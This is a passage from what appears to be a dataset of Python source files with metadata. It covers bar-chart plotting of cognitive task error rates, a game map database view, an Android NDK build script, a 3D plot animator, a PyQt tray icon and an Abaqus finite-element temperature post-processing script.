ax1.get_position()\nax1.set_position([box.x0, box.y0, box.width * 0.8, box.height])\nax1.legend(bbox_to_anchor=(1.04,0.5), loc=\"center left\", borderaxespad = 0, fontsize = 14)\nax1.set_ylim([0,25])\n\n####Now make the graph for local vs global costs####\n##get only the variables that are needed\nerror_dat_ya3 = error_dat_ya[ error_dat_ya[\"VAR\"].isin([\"ALT_GLOBAL\", \"RAND_GLOBAL\", \"ALT_LOCAL\", \"RAND_LOCAL\"])] \nerror_dat_healthy3 = error_dat_healthy[ error_dat_healthy[\"VAR\"].isin([\"ALT_GLOBAL\", \"RAND_GLOBAL\", \"ALT_LOCAL\", \"RAND_LOCAL\"])] \nerror_dat_mci3 = error_dat_mci[ error_dat_mci[\"VAR\"].isin([\"ALT_GLOBAL\", \"RAND_GLOBAL\", \"ALT_LOCAL\", \"RAND_LOCAL\"])]\n\n##Now get averages and conf intervals\n##averages\nya_average3 = error_dat_ya3[\"Average\"]\nya_average4 = ya_average3.tolist() #convert to list\n\nhealthy_average3 = error_dat_healthy3[\"Average\"]\nhealthy_average4 = healthy_average3.tolist()\n\nmci_average3 = error_dat_mci3[\"Average\"]\nmci_average4 = mci_average3.tolist()\n\n##get conf intervals\nya_conf3 = error_dat_ya3[\"diff2\"]\nya_conf4 = ya_conf3.tolist() #convert to list\n\nhealthy_conf3 = error_dat_healthy3[\"diff2\"]\nhealthy_conf4 = healthy_conf3.tolist()\n\nmci_conf3 = error_dat_mci3[\"diff2\"]\nmci_conf4 = mci_conf3.tolist()\n\n##make the bars\nbars4 = ya_average4\nbars5 = healthy_average4\nbars6 = mci_average4\n\n#set bar position\nr4 = np.arange(len(bars4)) + .5\nr5 = [x + barwidth2 for x in r4]\nr6 = [x + barwidth2 for x in r5]\n\n##make the plot\nrects4 = ax2.bar(r4, bars4, width = barwidth2, yerr = ya_conf4, capsize = 3, color = 'w', edgecolor = 'k',\n label ='Younger Adults')\n\nrects5 = ax2.bar(r5, bars5, width = barwidth2, yerr = healthy_conf4, capsize = 3, color = 'silver', edgecolor = 'k',\n label = 'Healthy Older')\n\nrects6 = ax2.bar(r6, bars6, width = barwidth2, yerr = mci_conf4, capsize = 3, color = 'dimgray', edgecolor = 'k',\n label = 'MCI Older')\n\n##Add labels, legend, and set tick 
marks\nax2.set_title('Mean Error Rates: Local and Global Switch Costs', fontsize = 18)\nax2.set_ylabel('Mean % Error', fontsize = 16)\nax2.set_xlabel('Cost Type', fontsize = 16)\nax2.xaxis.labelpad = 7.5\nax2.set_xticks(r5)\nax2.tick_params(axis='x', which = 'major', pad = 2.5) #controls how far labels are from axis\nax2.set_xticklabels(('Global Alt Run', 'Global Rand', 'Local Alt Run', 'Local Rand'), fontsize = 10)\nbox = ax2.get_position()\nax2.set_position([box.x0, box.y0, box.width * 0.8, box.height])\nax2.legend(bbox_to_anchor = (1.04,0.5), loc=\"center left\", borderaxespad = 0, fontsize = 14)\nax2.set_ylim([-2, 15])\nplt.axhline(y = 0, color='k', linestyle='-')\n\n##save figure\nerror_fig.savefig('CVOE_mean_errors.pdf', dip = 10000)\n","sub_path":"CVOE/3 Presentations/CVOE bar charts Fixed.py","file_name":"CVOE bar charts Fixed.py","file_ext":"py","file_size_in_byte":5901,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"642573361","text":"from cister.db.models.cister import Base\nfrom cister.db.models.cister import Fleet\nfrom cister.db.models.cister import Location\nfrom cister.db.models.cister import DBSession\nfrom datetime import datetime\nfrom cister.db.views import BaseCisterView\nfrom cister.db.helpers import createBlobDetails\n\n\nclass AstroView(BaseCisterView):\n\n def __call__(self):\n dbsession = DBSession()\n location = \"A\"\n location = \"%s%s\" % (location, self.request.matchdict.get(\"galaxy\"))\n location = \"%s:%s\" % (location, self.request.matchdict.get(\"region\"))\n location = \"%s:%s\" % (location, self.request.matchdict.get(\"system\"))\n location = \"%s:%s\" % (location, self.request.matchdict.get(\"astro\"))\n\n astro = dbsession.query(Location).filter(Location.location==location).one()\n base = astro.base\n fleets = dbsession.query(Fleet).filter(Fleet.location==location)\n fleets = fleets.order_by(\"arrival-(unix_timestamp(now())-unix_timestamp(fleet.timestamp)) > 0 ASC, 
arrival ASC, size DESC\")\n fleets_count = fleets.count()\n if fleets_count == 0:\n fleets = []\n\n\n blobdetails = createBlobDetails(location, fleets)\n blobdetails = blobdetails.values()\n def blobsize_compare(x, y):\n xsum = x['sum']\n ysum = y['sum']\n return int(ysum - xsum)\n blobdetails = sorted(blobdetails, cmp=blobsize_compare)\n\n returnvalue = { 'location':location,\n 'astrolocation':astro,\n 'base':base,\n 'fleets':fleets,\n 'fleets_count':fleets_count,\n 'datetime':datetime,\n 'blobdetails':blobdetails\n }\n returnvalue.update(self.request.matchdict)\n return returnvalue\n\n","sub_path":"cister/db/views/map/astro.py","file_name":"astro.py","file_ext":"py","file_size_in_byte":1831,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"653069687","text":"\nimport os\nimport shutil\n\ndef main():\n ANDROID_HOME = os.environ['ANDROID_HOME']\n #JAVA_HOME = os.environ['JAVA_HOME']\n NDK_ROOT = os.environ['NDK_ROOT']\n \n #archs = [ \"armeabi\", \"armeabi-v7a\", \"arm64-v8a\", \"x86\", \"x86_64\" ]\n #archs = [ \"armeabi-v7a\", \"arm64-v8a\", \"x86\", \"x86_64\" ]\n #archs = [ \"arm64-v8a\", \"x86\" ]\n archs = [ \"arm64-v8a\" ]\n #archs = [ \"x86_64\" ]\n \n base_cmake_cmd = '\"' + ANDROID_HOME + '\\\\cmake\\\\3.6.4111459\\\\bin\\\\cmake\"' + ' -G\"Android Gradle - Ninja\" .. 
-DANDROID_NDK=\"' + NDK_ROOT + '\" -DCMAKE_BUILD_TYPE=Release -DCMAKE_MAKE_PROGRAM=\"' + ANDROID_HOME + '\\\\cmake\\\\3.6.4111459\\\\bin\\\\ninja\" -DCMAKE_TOOLCHAIN_FILE=\"' + NDK_ROOT + '\\\\build\\\\cmake\\\\android.toolchain.cmake\" -DANDROID_NATIVE_API_LEVEL=9 -DANDROID_PLATFORM=android-24 -DANDROID_STL=c++_static -DANDROID_CPP_FEATURES=\"rtti exceptions\" -DANDROID_TOOLCHAIN=clang '\n \n base_build_cmd = '\"' + ANDROID_HOME + '\\\\cmake\\\\3.6.4111459\\\\bin\\\\ninja\" '\n \n # -DANDROID_ABI=armeabi-v7a\n \n # prepare assets\n os.system('DummyApp --prepare_assets android --norun')\n \n # build native part\n for arch in archs:\n if not os.path.exists(\"build-android-\" + arch):\n os.makedirs(\"build-android-\" + arch)\n os.chdir(\"build-android-\" + arch)\n os.system('\"' + base_cmake_cmd + '-DANDROID_ABI=' + arch + (' -DANDROID_ARM_NEON=TRUE' if arch == 'armeabi-v7a' else '') + '\"')\n os.chdir('..')\n \n os.chdir(\"build-android-\" + arch)\n ret = os.system('\"' + base_build_cmd + 'DummyApp' + '\"')\n \n if ret != 0:\n return\n \n os.chdir('..')\n \n if not os.path.exists(\"android\\\\lib\\\\\" + arch + \"\\\\\"):\n os.makedirs(\"android\\\\lib\\\\\" + arch + \"\\\\\")\n \n shutil.copy2(\"build-android-\" + arch + \"\\\\src\\\\DummyApp\\\\libDummyApp.so\", \"android\\\\lib\\\\\" + arch + \"\\\\\")\n \n # build java part\n os.system(\"android\\\\build.bat\")\n shutil.copy2(\"android\\\\bin\\\\DummyApp.apk\", \"DummyApp.apk\")\n \nmain()","sub_path":"build_android.py","file_name":"build_android.py","file_ext":"py","file_size_in_byte":2047,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"436398886","text":"import numpy as np\n\nfrom matplotlib import cm\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits import mplot3d\nimport matplotlib.animation as animation\n\n\nclass animator:\n def __init__(self, X, Y, Z, sequence,\n fig=0, name=None, interval=1):\n self.fig = plt.figure(fig)\n if name != None:\n 
self.fig.canvas.set_window_title(name)\n \n ax = self.fig.gca(projection='3d')\n ax.plot_surface(X, Y, Z, rstride=1, cstride=1,\n cmap='viridis', edgecolor='none', alpha=0.75)\n\n self.top = np.max(Z) + np.abs(np.min(Z))\n self.bottom = np.min(Z) - np.abs(np.max(Z))\n cset = ax.contourf(X,Y,Z,zdir='z',offset=self.bottom,cmap=cm.coolwarm)\n ax.set_zlim(self.bottom, self.top)\n ax.set_xlabel('x')\n ax.set_ylabel('y')\n ax.set_zlabel('z')\n if name != None:\n ax.title.set_text(name)\n \n self.origin = ax.scatter3D([],[],[],color='red',marker='*')\n self.projected = ax.scatter3D([],[],[],color='black')\n\n self.X = X\n self.Y = Y\n self.Z = Z\n self.interval = interval\n self.sequence = sequence\n\n\n def animate(self,i):\n x,y = self.sequence[i]\n self.origin._offsets3d = (self.X[x,y], self.Y[x,y], self.Z[x,y])\n self.projected._offsets3d = (self.X[x,y], self.Y[x,y], self.bottom)\n\n def render(self):\n self.ani = animation.FuncAnimation(self.fig, self.animate,\n frames=np.arange(len(self.sequence)), interval=self.interval, blit=False, repeat=False)\n plt.show()\n","sub_path":"animation.py","file_name":"animation.py","file_ext":"py","file_size_in_byte":1584,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"66259974","text":"import logging\n\nfrom PyQt5.QtCore import pyqtSlot\nfrom PyQt5.QtGui import QIcon\nfrom PyQt5.QtWidgets import QSystemTrayIcon, QMenu\n\nfrom gui.mainwindow import MainWindow\nfrom storage.settings_manager import SettingsManager, Settings\n\nlog = logging.getLogger(__file__)\n\n\nclass TrayIcon(QSystemTrayIcon):\n\n def __init__(self, icon: QIcon, parent: MainWindow):\n super().__init__(icon, parent)\n\n # setup UI\n self.setVisible(SettingsManager.get(Settings.TRAY_SHOW_ALWAYS))\n\n # variables\n # retrieve vars from class to print more informative log messages\n self._reasonNames = {value: name for name, value in vars(QSystemTrayIcon).items() if str(value).isnumeric()}\n self._mainWindow = 
parent\n self._trayMenu = self._createTrayMenu()\n self.setContextMenu(self._trayMenu)\n\n # signal and slots\n self.activated.connect(self._onMouseClicked)\n self._mainWindow.closed.connect(self.hide)\n self._mainWindow.trayed.connect(self.show)\n # self._mainWindow.raised.connect(self._onMainWindowRaised)\n\n def _createTrayMenu(self) -> QMenu:\n \"\"\"\n Create tray icon menu\n :return: menu\n \"\"\"\n menu = QMenu(self._mainWindow)\n menu.addAction(self._mainWindow.ui.actionExit)\n return menu\n\n @pyqtSlot()\n def _onMainWindowRaised(self):\n if not SettingsManager.get(Settings.TRAY_SHOW_ALWAYS):\n self.hide()\n\n @pyqtSlot(QSystemTrayIcon.ActivationReason)\n def _onMouseClicked(self, reason: QSystemTrayIcon.ActivationReason):\n \"\"\"\n Process mouse click events\n :param reason: click reason\n :return: None\n \"\"\"\n\n if reason == QSystemTrayIcon.Trigger:\n self._mainWindow.toggleWindow()\n elif reason == QSystemTrayIcon.MiddleClick:\n self._mainWindow.exit()\n else:\n log.warning(f\"Unknown QSystemTrayIcon mouse reason: {self._reasonNames[reason]}\")\n","sub_path":"vid2audio/gui/trayicon.py","file_name":"trayicon.py","file_ext":"py","file_size_in_byte":1977,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"458508167","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Oct 30 10:52:17 2017\r\n\r\n@author: ITA\r\n\"\"\"\r\n\r\n# -*- coding: utf-8 -*-\r\n\"\"\"\r\nThis script determines the element that has the maximum value of Sigmaxx after\r\nthe printing has finished.\r\n\r\nV4: READS ALSO STRESSES AT TWO FRAMES OF THE LAST STEP (INITIAL AND FINAL)\r\n\r\nV5: FLAG TO CHOOSE IF BOTH FRAMES ARE SAVED\r\n\"\"\"\r\n#from part import *\r\n#from material import *\r\n#from section import *\r\n#from assembly import *\r\n#from step import *\r\n#from interaction import *\r\n#from load import *\r\n#from mesh import *\r\n#from optimization import *\r\n#from job import *\r\n#from sketch import *\r\n#from 
visualization import *\r\n#from connectorBehavior import *\r\n\r\n#import math\r\n#import numpy as np\r\nfrom odbAccess import *\r\nfrom abaqusConstants import *\r\n\r\nimport odbAccess\r\n\r\nfrom multiprocessing import Pool\r\nfrom functools import partial\r\n\r\nimport math\r\nimport numpy as np\r\n\r\nimport os, os.path\r\n\r\nclass SHAPE_FUNCTIONS:\r\n def __init__(self, DIM,NNODES):\r\n self.DIMENSION = DIM\r\n self.number_nodes = NNODES\r\n \r\n def natural_nodes(self, vecX, vecY, vecZ):\r\n self.X = vecX\r\n self.Y = vecY\r\n self.Z = vecZ\r\n \r\n def nodal_temperature(self,vec_TEMP):\r\n self.TEMP_NODAL = vec_TEMP\r\n \r\n def brick_element(self,r,s,t):\r\n oneO8 = 1.0/8.0\r\n one = 1.0\r\n \r\n N1 = oneO8 *(1-r)*(1-s)*(1-t)\r\n \r\n N2 = oneO8 *(1+r)*(1-s)*(1-t)\r\n \r\n N3 = oneO8 *(1+r)*(1+s)*(1-t)\r\n \r\n N4 = oneO8 *(1-r)*(1+s)*(1-t)\r\n \r\n N5 = oneO8 *(1-r)*(1-s)*(1+t)\r\n \r\n N6 = oneO8 *(1+r)*(1-s)*(1+t)\r\n \r\n N7 = oneO8 *(1+r)*(1+s)*(1+t)\r\n \r\n N8 = oneO8 *(1-r)*(1+s)*(1+t)\r\n \r\n vec_shape = np.zeros((1,8)) \r\n vec_shape[0] = [N1,N2,N3,N4,N5,N6,N7,N8]\r\n \r\n dN1dr = oneO8 *(-one)*(1-s)*(1-t)\r\n dN1ds = oneO8 *(1-r)*(-one)*(1-t)\r\n dN1dt = oneO8 *(1-r)*(1-s)*(-one)\r\n \r\n dN2dr = oneO8 *(one)*(1-s)*(1-t)\r\n dN2ds = oneO8 *(1+r)*(-one)*(1-t)\r\n dN2dt = oneO8 *(1+r)*(1-s)*(-one)\r\n \r\n dN3dr = oneO8 *(one)*(1+s)*(1-t)\r\n dN3ds = oneO8 *(1+r)*(one)*(1-t)\r\n dN3dt = oneO8 *(1+r)*(1+s)*(-one)\r\n \r\n dN4dr = oneO8 *(-one)*(1+s)*(1-t)\r\n dN4ds = oneO8 *(1-r)*(one)*(1-t)\r\n dN4dt = oneO8 *(1-r)*(1+s)*(-one)\r\n \r\n dN5dr = oneO8 *(-one)*(1-s)*(1+t)\r\n dN5ds = oneO8 *(1-r)*(-one)*(1+t)\r\n dN5dt = oneO8 *(1-r)*(1-s)*(one)\r\n \r\n dN6dr = oneO8 *(one)*(1-s)*(1+t)\r\n dN6ds = oneO8 *(1+r)*(-one)*(1+t)\r\n dN6dt = oneO8 *(1+r)*(1-s)*(one)\r\n \r\n dN7dr = oneO8 *(one)*(1+s)*(1+t)\r\n dN7ds = oneO8 *(1+r)*(one)*(1+t)\r\n dN7dt = oneO8 *(1+r)*(1+s)*(one)\r\n \r\n dN8dr = oneO8 *(-one)*(1+s)*(1+t)\r\n dN8ds = oneO8 
*(1-r)*(one)*(1+t)\r\n dN8dt = oneO8 *(1-r)*(1+s)*(one)\r\n \r\n MAT_diff = np.zeros((8,3))\r\n \r\n MAT_diff[0] = [ dN1dr , dN1ds , dN1dt ]\r\n MAT_diff[1] = [ dN2dr , dN2ds , dN2dt ]\r\n MAT_diff[2] = [ dN3dr , dN3ds , dN3dt ]\r\n MAT_diff[3] = [ dN4dr , dN4ds , dN4dt ]\r\n MAT_diff[4] = [ dN5dr , dN5ds , dN5dt ]\r\n MAT_diff[5] = [ dN6dr , dN6ds , dN6dt ]\r\n MAT_diff[6] = [ dN7dr , dN7ds , dN7dt ]\r\n MAT_diff[7] = [ dN8dr , dN8ds , dN8dt ]\r\n\r\n self.shapefun = vec_shape\r\n self.shape_diff = MAT_diff\r\n \r\n def JACOBIAN(self):\r\n# NODE_COORD.X = x coordinates \r\n if self.DIMENSION == 3:\r\n JACOBIAN = np.zeros((3,3))\r\n for i in range(0,3):\r\n somax = 0.0\r\n somay = 0.0\r\n somaz = 0.0\r\n for k in range(0,self.number_nodes):\r\n aux = self.X[k]*self.shape_diff[k][i]\r\n somax = somax + aux\r\n \r\n aux = self.Y[k]*self.shape_diff[k][i]\r\n somay = somay + aux\r\n \r\n aux = self.Z[k]*self.shape_diff[k][i]\r\n somaz = somaz + aux\r\n \r\n JACOBIAN[i,0] = somax\r\n JACOBIAN[i,1] = somay\r\n JACOBIAN[i,2] = somaz\r\n \r\n self.detJACOBIAN = np.linalg.det(JACOBIAN)\r\n \r\n \r\n def TEMPERATURE_RST(self):\r\n TEMP_RST = 0.0\r\n for i in range(0,len(self.TEMP_NODAL)):\r\n TEMP_RST = TEMP_RST + self.TEMP_NODAL[i]*self.shapefun[0][i]\r\n self.TEMP_RST = TEMP_RST\r\n \r\n def FUNCTION_INTEGRATED_RST(self,r,s,t):\r\n \r\n self.brick_element(r,s,t) #changes shapefun and diff shapefun\r\n \r\n self.JACOBIAN() #calculates Jacobian at new r,s,t\r\n \r\n self.TEMPERATURE_RST()\r\n \r\n f = self.TEMP_RST*abs(self.detJACOBIAN)\r\n \r\n return f\r\n#------------------------------------------------------------------------------\r\nclass GAUSS_POINTS:\r\n def __init__(self, npoints):\r\n self.points = npoints\r\n \r\n #W = weight\r\n #P = point\r\n if npoints == 2:\r\n self.W = [1.0,1.0]\r\n \r\n root3 = math.sqrt(3)\r\n self.P = [-1/root3, 1/root3]\r\n \r\n elif npoints == 1:\r\n self.W = [2.0]\r\n self.P = [0.0]\r\n \r\n elif npoints == 3:\r\n root3 = 
math.sqrt(3)\r\n root5 = math.sqrt(5)\r\n \r\n fiveOnine = 5./9.\r\n \r\n self.W = [fiveOnine, 8./9., fiveOnine]\r\n self.P = [-root3/root5,0.0, root3/root5]\r\n \r\n#==============================================================================\r\n# QUAD GAUSS 2D OR 3D\r\n#==============================================================================\r\ndef gauss_quad(DIM,func_name):\r\n Nx = 3\r\n Ny = 3\r\n Nz = 3\r\n \r\n X = GAUSS_POINTS(Nx)\r\n Y = GAUSS_POINTS(Ny)\r\n Z = GAUSS_POINTS(Nz)\r\n \r\n sum_gauss = 0.0\r\n \r\n if DIM == 2:\r\n for j in range(0,Ny):\r\n \r\n p_x2 = Y.P[j]\r\n w_x2 = Y.W[j]\r\n \r\n for i in range(0,Nx):\r\n p_x1 = X.P[i]\r\n w_x1 = X.W[i]\r\n \r\n point = (p_x1,p_x2)\r\n \r\n f = func_name(point)\r\n \r\n sum_gauss = sum_gauss + w_x1*f\r\n \r\n sum_gauss = sum_gauss * w_x2\r\n \r\n elif DIM == 3:\r\n for k in range(0,Nz):\r\n p_x3 = Z.P[k]\r\n w_x3 = Z.W[k]\r\n \r\n aux_gauss_j = 0.0\r\n for j in range(0,Ny):\r\n p_x2 = Y.P[j]\r\n w_x2 = Y.W[j]\r\n \r\n aux_gauss_i = 0.0\r\n for i in range(0,Nx):\r\n p_x1 = X.P[i]\r\n w_x1 = X.W[i]\r\n \r\n point = (p_x1,p_x2,p_x3)\r\n \r\n f = func_name(p_x1,p_x2,p_x3)\r\n \r\n aux_gauss_i = aux_gauss_i + w_x1*f\r\n \r\n aux_gauss_j = aux_gauss_j + aux_gauss_i * w_x2\r\n sum_gauss = sum_gauss + aux_gauss_j* w_x3\r\n \r\n \r\n return sum_gauss\r\n \r\n#------------------------------------------------------------------------------ \r\n#==============================================================================\r\n# WRITING VECTORS OF NODAL X, Y AND Z\r\n#==============================================================================\r\ndef rewrite_vec_pos(newnodes,ELE_TYPE):\r\n vecX = list()\r\n vecY = list()\r\n vecZ = list()\r\n for i in range(0,ELE_TYPE):\r\n node_i = newnodes[i]\r\n \r\n vecX.append(node_i[0])\r\n vecY.append(node_i[1])\r\n vecZ.append(node_i[2])\r\n \r\n return vecX,vecY,vecZ\r\n \r\n#==============================================================================\r\n# 
CALCULATE DISTANCE BETWEEN 2 POINTS\r\n#==============================================================================\r\ndef distance(coord1,coord2):\r\n aux = 0.0\r\n for i in range(0,len(coord1)):\r\n aux_i = (coord1[i] - coord2[i])**2\r\n aux = aux + aux_i\r\n \r\n dist = math.sqrt(aux)\r\n return dist\r\n \r\n#==============================================================================\r\n# CALCULATING NEW COORDINATES FOR EACH ELEMENT\r\n#==============================================================================\r\ndef ELEMENT_DATA(Instance,R_table,table_nodes,table_CONEC,ele_number,ELE_TYPE):\r\n #Instance = number of the instance\r\n\r\n translate = R_table[Instance - 1] #translation vector\r\n\r\n NODES = table_CONEC[ele_number - 1] #node number of the current element\r\n \r\n new_coordinates = list() #coordinates of each node of the current element\r\n \r\n for i in range(0,ELE_TYPE):\r\n \r\n node_i = int(NODES[i])\r\n \r\n coord_i = table_nodes[node_i - 1] #coordinate of node _i\r\n \r\n aux_coord = list()\r\n for j in range(0,3):\r\n aux = float(coord_i[j]) + translate[j]\r\n \r\n aux_coord.append(aux)\r\n \r\n new_coordinates.append(aux_coord)\r\n \r\n lx = distance(new_coordinates[1],new_coordinates[2])\r\n ly = distance(new_coordinates[1],new_coordinates[0])\r\n lz = distance(new_coordinates[0],new_coordinates[4])\r\n \r\n Vol = lx * ly * lz #element volume\r\n \r\n return new_coordinates, Vol\r\n \r\n#==============================================================================\r\n# READING INP FILE\r\n#==============================================================================\r\ndef read_inp(name_file_inp): \r\n file_read = open(name_file_inp, 'r');#READS THE INP FILE\r\n \r\n ELE_TYPE = 8 #NUMBER OF NODES PER ELEMENT\r\n #JUMPING LINES\r\n for i in range(0,9):\r\n file_read.readline()\r\n \r\n #READING NODES -----------------------------------------------------------\r\n aux_stop = \"t\";\r\n \r\n table_nodes = list()\r\n while aux_stop 
!= \"*\":\r\n node_aux = file_read.readline()\r\n aux_stop = node_aux[0]\r\n node_aux = node_aux.replace(\",\", \"\")\r\n node_aux = node_aux.split();\r\n table_nodes.append(node_aux[1:4])\r\n \r\n del table_nodes[-1] #DELETE LAST ELEMENT\r\n NUMBER_NODES = len(table_nodes)\r\n \r\n #------------------------------------------------------------------------------\r\n #READING ELEMENTS--------------------------------------------------------------\r\n aux_stop = \"t\";\r\n \r\n table_CONEC = list()\r\n while aux_stop != \"*\":\r\n ele_aux = file_read.readline()\r\n aux_stop = ele_aux[0]\r\n ele_aux = ele_aux.replace(\",\", \"\")\r\n ele_aux = ele_aux.split();\r\n while len(ele_aux) < (ELE_TYPE + 1):\r\n ele_aux2 = file_read.readline()\r\n ele_aux2 = ele_aux2.replace(\",\", \"\")\r\n ele_aux2 = ele_aux2.split();\r\n ele_aux = ele_aux + ele_aux2\r\n \r\n table_CONEC.append(ele_aux[1:ELE_TYPE+1])\r\n \r\n \r\n del table_CONEC[-1] #DELETE LAST ELEMENT\r\n NUMBER_ELE = len(table_CONEC) #ELEMENTS PER INSTANCE\r\n \r\n #------------------------------------------------------------------------------\r\n #READING THE VECTOR R OF ASSEMBLY\r\n aux_stop = \"t\";\r\n \r\n while aux_stop != \"*Instance, name=I-1\":\r\n aux_stop = file_read.readline()\r\n aux_stop = aux_stop[0:19]\r\n \r\n aux_stop = \"*I\"\r\n R_table = list()\r\n LAYER_INSTANCE = list() #LIST THAT SAYS WHICH LAYER EACH INSTANCE IS AT\r\n LAYER_INSTANCE.append(1) #FIRST INSTANCE = LAYER 1\r\n aux_instance_layer = 0.0\r\n layer_cont = 1\r\n while aux_stop == \"*I\":\r\n file_read.readline()\r\n file_read.readline()\r\n \r\n aux_stop = file_read.readline()\r\n aux_stop = aux_stop[0:2]\r\n \r\n coord_R = file_read.readline()\r\n coord_R = coord_R.replace(\",\", \"\")\r\n coord_R = coord_R.split();\r\n \r\n for i in range(0,3):\r\n coord_R[i] = float(coord_R[i])\r\n \r\n #CHECKING THE LAYER INSTANCES\r\n if float(coord_R[2]) > aux_instance_layer:\r\n aux_instance_layer = float(coord_R[2])\r\n layer_cont = layer_cont + 
1\r\n \r\n LAYER_INSTANCE.append(layer_cont)\r\n R_table.append(coord_R)\r\n \r\n del R_table[-1] #DELETE LAST ELEMENT\r\n del LAYER_INSTANCE[-1] #DELETE LAST ELEMENT\r\n NUMBER_LAYER = max(LAYER_INSTANCE) #NUMBER OF LAYERS\r\n R_table.insert(0,[0.0, 0.0, 0.0]) #FIRST INTANCE R = [0 0 0]\r\n NUMBER_INSTANCE = len(R_table)\r\n NUMBER_ELE = len(table_CONEC) #ELEMENTS PER INSTANCE\r\n file_read.close()\r\n \r\n return R_table, table_nodes, table_CONEC\r\n\r\n#==============================================================================\r\n# READ ODB\r\n#==============================================================================\r\ndef read_odb(i,name_old,num_steps,num_instances,print_pattern,ELE_TYPE,R_table,table_nodes,table_CONEC,BRICK):\r\n \r\n myOdb = odbAccess.openOdb(path=name_old, readOnly = True)\r\n \r\n ALLInstances = myOdb.rootAssembly.instances\r\n \r\n \r\n name_new = name_old.replace('.odb','_%d.txt' %(i+1))\r\n \r\n report_name = 'report-%d.txt' %(i+1)\r\n \r\n file_report = open(report_name,'w')\r\n file_report.close()\r\n #RESTART:\r\n aux_restart = 0 #DOES NOT RESTART\r\n \r\n if os.path.isfile(name_new): #it file exists\r\n file_new = open(name_new,'r')\r\n \r\n cont_line = 0\r\n \r\n for line in file_new:\r\n cont_line = cont_line + 1\r\n \r\n file_new.close()\r\n if cont_line < 14:\r\n aux_restart = 1\r\n \r\n if not os.path.isfile(name_new) or aux_restart == 1: #it file does not exists or has not been written entirely\r\n file_new = open(name_new,'w')\r\n \r\n total_time = 0.0\r\n \r\n \r\n if i == num_steps - 1: #last step\r\n step_name = 'Step-FINAL-THERMAL-STEP'\r\n num_instance_now = num_instances\r\n else: \r\n step_name = 'Step-%d' %(i+1)\r\n num_instance_now = i + 1\r\n \r\n step_now = myOdb.steps[step_name]\r\n num_frames = len(step_now.frames)\r\n \r\n file_new.write(\"--------------------------------------------------\\n\")\r\n file_new.write(\"%s\\n\" %step_name)\r\n \r\n for j in range(0,num_frames):\r\n frame_now = 
step_now.frames[j]\r\n \r\n time_step = frame_now.frameValue\r\n total_time = total_time + time_step\r\n \r\n TEMP_aux = frame_now.fieldOutputs['TEMP'] \r\n \r\n file_new.write(\"FRAME = %d ----------------------------------------\\n\" %j)\r\n file_new.write(\"TIME [s] = %f\\n\" %total_time)\r\n \r\n cont_ele = 0 #global elements\r\n \r\n Vol_total = 0.0 #volume total is zeroed in each frame\r\n \r\n Int_temp_total = 0.0 #integration sum variable is zeroed in each frame\r\n \r\n file_new_frame = name_new.replace('.txt','') + 'F%d.txt' %(j)\r\n \r\n for k in range(1,num_instance_now+1):\r\n \r\n intance_number = print_pattern[k-1]\r\n \r\n file_name_new_I = file_new_frame.replace('.txt','') + '_I%d.txt' %(intance_number)\r\n file_new_I = open(file_name_new_I,'w')\r\n \r\n instanceName = 'I-%d' %intance_number\r\n \r\n myInstance = ALLInstances[instanceName]\r\n \r\n numElements = len(myInstance.elements)\r\n \r\n Vol_total = 0.0 #volume total is zeroed in each frame\r\n \r\n Int_temp_total = 0.0 #integration sum variable is zeroed in each frame\r\n \r\n for el in range(0,numElements):\r\n #Isolate current and previous element's stress field\r\n \r\n #THOSE RESULTS ARE NO AVERAGED\r\n #POSITION = INTEGRATION_POINT/ELEMENT_NODAL/CENTROID\r\n region_aux = myInstance.elements[el]\r\n \r\n TEMP_NODAL = TEMP_aux.getSubset(\r\n region=region_aux,position=ELEMENT_NODAL,elementType='DC3D8').values\r\n \r\n cont_ele = cont_ele +1\r\n \r\n local_ele = el+1\r\n \r\n TEMP_NODE_ip = list()\r\n \r\n for ip in range(0,ELE_TYPE): #node loop\r\n \r\n TEMP_NODE_ip.append(TEMP_NODAL[ip].data)\r\n \r\n \r\n (new_coordinates, Vol) = ELEMENT_DATA(intance_number,R_table,table_nodes,table_CONEC,local_ele,ELE_TYPE) \r\n \r\n Vol_total = Vol_total + Vol\r\n \r\n #Post-Processing ----------------------------------------------\r\n (vecX,vecY,vecZ) = rewrite_vec_pos(new_coordinates,ELE_TYPE)\r\n \r\n BRICK.natural_nodes(vecX, vecY, vecZ)\r\n \r\n BRICK.nodal_temperature(TEMP_NODE_ip)\r\n \r\n # 
print BRICK.nodal_temperature\r\n \r\n #Integrating temperature distribution within the element\r\n Iaux = gauss_quad(BRICK.DIMENSION,BRICK.FUNCTION_INTEGRATED_RST)\r\n Int_temp_total = Int_temp_total + Iaux\r\n \r\n \r\n file_new_I.write(\"Integral Volume\\n\")\r\n file_new_I.write('%f %E\\n'%(Int_temp_total/Vol_total,Vol_total))\r\n file_new_I.close()\r\n\r\n file_new.close()\r\n myOdb.close()\r\n#------------------------------------------------------------------------------ \r\n\r\nif __name__ == '__main__': \r\n \r\n ELE_TYPE = 8\r\n pool = Pool(processes=20)\r\n #Odb file in the work directory:\r\n odb_name = 'job_sim1_mesh_2_2_2.odb' \r\n \r\n myOdb = odbAccess.openOdb(path=odb_name, readOnly = True)\r\n #--------------------------------------------------------------------------\r\n \r\n ALLInstances = myOdb.rootAssembly.instances\r\n num_instances = len(ALLInstances)\r\n \r\n mysteps = myOdb.steps\r\n num_steps = len(mysteps)\r\n# myOdb.close()\r\n \r\n #==========================================================================\r\n # Reading report file\r\n #========================================================================== \r\n report_file_name = 'REPORT_sim1_mesh_2_2_2.txt'\r\n file_report = open(report_file_name,'r')\r\n \r\n print_pattern = list()\r\n \r\n for i in range(0,24):\r\n file_report.readline() #jumping lines\r\n for i in range(0,num_instances):\r\n print_pattern.append(int(file_report.readline()))\r\n \r\n file_report.close() \r\n \r\n \r\n #--------------------------------------------------------------------------\r\n \r\n #==============================================================================\r\n #READING INP FILE\r\n #==============================================================================\r\n name_file_inp = 'job_sim1_mesh_2_2_2.inp' #INP FILE OF THE ANALYSIS(MUST CONTAIN THE ASSEMBLY)\r\n R_table, table_nodes, table_CONEC = 